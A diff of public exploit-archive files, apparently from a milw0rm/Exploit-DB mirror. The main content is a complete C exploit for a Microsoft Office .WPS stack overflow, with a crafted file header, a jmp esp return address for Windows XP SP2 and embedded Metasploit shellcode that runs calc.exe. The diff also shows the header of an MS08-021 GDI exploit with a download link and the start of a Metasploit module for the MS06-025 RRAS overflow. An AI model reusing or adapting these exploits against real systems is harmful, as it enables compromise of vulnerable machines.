+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
+"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
-"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x01\x00\x00\x00"
+"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x01\x00\x00\x00"
-"\xb2\x5a\xa4\x0e\x0a\x9e\xd1\x11\xa4\x07\x00\xc0\x4f\xb9\x32\xba"
+"\xb2\x5a\xa4\x0e\x0a\x9e\xd1\x11\xa4\x07\x00\xc0\x4f\xb9\x32\xba"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x10\xb9\x5f"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x10\xb9\x5f"
-"\x53\x8f\xc7\x01\x03\x00\x00\x00\xc0\x0a\x00\x00\x00\x00\x00\x00"
+"\x53\x8f\xc7\x01\x03\x00\x00\x00\xc0\x0a\x00\x00\x00\x00\x00\x00"
-"\x43\x00\x4f\x00\x4e\x00\x54\x00\x45\x00\x4e\x00\x54\x00\x53\x00"
+"\x43\x00\x4f\x00\x4e\x00\x54\x00\x45\x00\x4e\x00\x54\x00\x53\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x01\x02\x00\x00\x00\x03\x00\x00\x00\xff\xff\xff\xff"
+"\x12\x00\x02\x01\x02\x00\x00\x00\x03\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x28\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x28\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x00"
-"\x53\x00\x50\x00\x45\x00\x4c\x00\x4c\x00\x49\x00\x4e\x00\x47\x00"
+"\x53\x00\x50\x00\x45\x00\x4c\x00\x4c\x00\x49\x00\x4e\x00\x47\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x2a\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x2a\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
+"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
-"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
+"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
-"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
+"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
-"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
+"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
-"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
+"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
-"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
+"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
-"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
+"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
-"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
+"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
-"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\xfe\xff\xff\xff"
+"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\xfe\xff\xff\xff"
-"\x29\x00\x00\x00\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\x29\x00\x00\x00\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x43\x48\x4e\x4b\x57\x4b\x53\x20\x04\x00\x08\x00\x0e\x00\x00\x03"
+"\x43\x48\x4e\x4b\x57\x4b\x53\x20\x04\x00\x08\x00\x0e\x00\x00\x03"
-"\x00\x02\x00\x00\x00\x0a\x00\x00\xf8\x01\x0e\x00\xff\xff\xff\xff"
+"\x00\x02\x00\x00\x00\x0a\x00\x00\xf8\x01\x0e\x00\xff\xff\xff\xff"
-"\x18\x00\x54\x45\x58\x54\x00\x00\x2f\x00\x00\x00\x00\x00\x00\x00"
+"\x18\x00\x54\x45\x58\x54\x00\x00\x2f\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-
+
-/* Shellcode - metasploit exec calc.exe */
+/* Shellcode - metasploit exec calc.exe */
-unsigned char uszShellcode[] =
+unsigned char uszShellcode[] =
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
+"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
-"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
+"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
-"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
+"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
-"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
+"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
-"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
+"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
-"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
+"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
-"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
+"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
-"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
+"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
-"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
+"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
-"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
+"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
-"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
+"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
-"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
+"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
-"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
+"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
-"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
+"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
-"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
+"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
-"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
+"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
-"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
+"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
-"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
+"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
-"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
+"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
-"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
+"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
-
+
-char szIntro[] =
+char szIntro[] =
-"\n\t\tMicrosoft Office .WPS Stack Overflow\n"
+"\n\t\tMicrosoft Office .WPS Stack Overflow\n"
-"\t\t\tAdam Walker (c) 2007\n"
+"\t\t\tAdam Walker (c) 2007\n"
-"[+] Targets:\n"
+"[+] Targets:\n"
-"\t(1) Windows XP SP2 ntdll.dll de\n"
+"\t(1) Windows XP SP2 ntdll.dll de\n"
-"Usage: wps.exe <target> <file>";
+"Usage: wps.exe <target> <file>";
-
+
-typedef struct {
+typedef struct {
-	const char *szTarget;
+	const char *szTarget;
-	unsigned char uszRet[5];
+	unsigned char uszRet[5];
-} TARGET;
+} TARGET;
-
+
-TARGET targets[] = {
+TARGET targets[] = {
-	{ "Windows XP SP2 de ntdll.dll", "\xED\x1E\x94\x7C" },		/* jmp esp */
+	{ "Windows XP SP2 de ntdll.dll", "\xED\x1E\x94\x7C" },		/* jmp esp */
-};
+};
-
+
-int main( int argc, char **argv ) {
+int main( int argc, char **argv ) {
-	char szBuffer[1024*10];
+	char szBuffer[1024*10];
-	FILE *f;
+	FILE *f;
-	void *pExitProcess[4];
+	void *pExitProcess[4];
-
+
-	if ( argc < 3 ) {
+	if ( argc < 3 ) {
-		printf("%s\n", szIntro );
+		printf("%s\n", szIntro );
-		return 0;
+		return 0;
-	}
+	}
-	
+	
-	memset(szBuffer, 0x90, 1024*10);
+	memset(szBuffer, 0x90, 1024*10);
-	
+	
-	printf("[+] Creating WPS header...\n");
+	printf("[+] Creating WPS header...\n");
-	memcpy( szBuffer, uszWpsHeader, sizeof( uszWpsHeader ) - 1 );
+	memcpy( szBuffer, uszWpsHeader, sizeof( uszWpsHeader ) - 1 );
-
+
-	printf("[+] Copying addr && nops && shellcode...\n");
+	printf("[+] Copying addr && nops && shellcode...\n");
-	memcpy( szBuffer + sizeof( uszWpsHeader ) - 1, targets[atoi( argv[1] + 1 )].uszRet, 4 );
+	memcpy( szBuffer + sizeof( uszWpsHeader ) - 1, targets[atoi( argv[1] + 1 )].uszRet, 4 );
-	memcpy( szBuffer + sizeof( uszWpsHeader ) + 3, uszShellcode, sizeof( uszShellcode ) - 1 );
+	memcpy( szBuffer + sizeof( uszWpsHeader ) + 3, uszShellcode, sizeof( uszShellcode ) - 1 );
-
+
-	f = fopen( argv[2], "wb" );
+	f = fopen( argv[2], "wb" );
-	if ( f == NULL ) {
+	if ( f == NULL ) {
-		printf("[-] Cannot create file\n");
+		printf("[-] Cannot create file\n");
-		return 0;
+		return 0;
-	}
+	}
-
+
-	fwrite( szBuffer, 1, sizeof( szBuffer) , f );
+	fwrite( szBuffer, 1, sizeof( szBuffer) , f );
-	fclose( f );
+	fclose( f );
-	printf("[+] .WPS file succesfully created!\n");
+	printf("[+] .WPS file succesfully created!\n");
-	return 0;
+	return 0;
-}
+}
-
+
-// milw0rm.com [2008-02-13]
+// milw0rm.com [2008-02-13]
--- a/platforms/windows/local/5442.cpp
+++ b/platforms/windows/local/5442.cpp
@ -1,15 +1,15 @@
-/////////////////////////////////////////////////////////////
+/////////////////////////////////////////////////////////////
-///Exploit the MS08-021 : Stack Overflow on GDI API
+///Exploit the MS08-021 : Stack Overflow on GDI API
-///Author: Lamhtz
+///Author: Lamhtz
-///Date: April 14th, 2008
+///Date: April 14th, 2008
-///Usage: <appname.exe> [filename]
+///Usage: <appname.exe> [filename]
-///Function: Generate a crafted emf file which could 
+///Function: Generate a crafted emf file which could 
-///          automatically run calc.exe in Win2kSP4 CHS Version
+///          automatically run calc.exe in Win2kSP4 CHS Version
-///			 with MS07-046 patched but no MS08-021 is installed.
+///			 with MS07-046 patched but no MS08-021 is installed.
-///			 In Windows XP SP2, explorer.exe will crashed but
+///			 In Windows XP SP2, explorer.exe will crashed but
-///          calc will not be run.
+///          calc will not be run.
-/////////////////////////////////////////////////////////////
+/////////////////////////////////////////////////////////////
-
+
-http://www.milw0rm.com/sploits/2008-exploit_08021.zip
+http://www.milw0rm.com/sploits/2008-exploit_08021.zip
-
+
-// milw0rm.com [2008-04-14]
+// milw0rm.com [2008-04-14]
--- a/platforms/windows/remote/1965.pm
+++ b/platforms/windows/remote/1965.pm
@ -1,261 +1,260 @@
-
+##
-##
+# This file is part of the Metasploit Framework and may be redistributed
-# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
-# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
-# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
-# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
-# version of the Framework can always be obtained from metasploit.com.
+##
-##
+
-
+package Msf::Exploit::rras_ms06_025_rasman;
-package Msf::Exploit::rras_ms06_025_rasman;
+use base "Msf::Exploit";
-use base "Msf::Exploit";
+use strict;
-use strict;
+
-
+use Pex::DCERPC;
-use Pex::DCERPC;
+use Pex::SMB;
-use Pex::SMB;
+use Pex::NDR;
-use Pex::NDR;
+
-
+my $advanced = {
-my $advanced = {
+	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
-	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
+	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
-	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
+	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
-	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
+  };
-  };
+
-
+my $info = {
-my $info = {
+	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
-	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
+	'Version' => '$Revision: 1.1 $',
-	'Version' => '$Revision: 1.1 $',
+	'Authors' =>
-	'Authors' =>
+	  [
-	  [
+		'Pusscat <pusscat [at] gmail.com>',
-		'Pusscat <pusscat [at] gmail.com>',
+		'H D Moore <hdm [at] metasploit.com>'
-		'H D Moore <hdm [at] metasploit.com>'
+	  ],
-	  ],
+
-
+	'Arch' => ['x86'],
-	'Arch' => ['x86'],
+	'OS'   => [ 'win32', 'win2000', 'winxp' ],
-	'OS'   => [ 'win32', 'win2000', 'winxp' ],
+	'Priv' => 1,
-	'Priv' => 1,
+
-
+	'AutoOpts' => { 'EXITFUNC' => 'thread' },
-	'AutoOpts' => { 'EXITFUNC' => 'thread' },
+	'UserOpts' =>
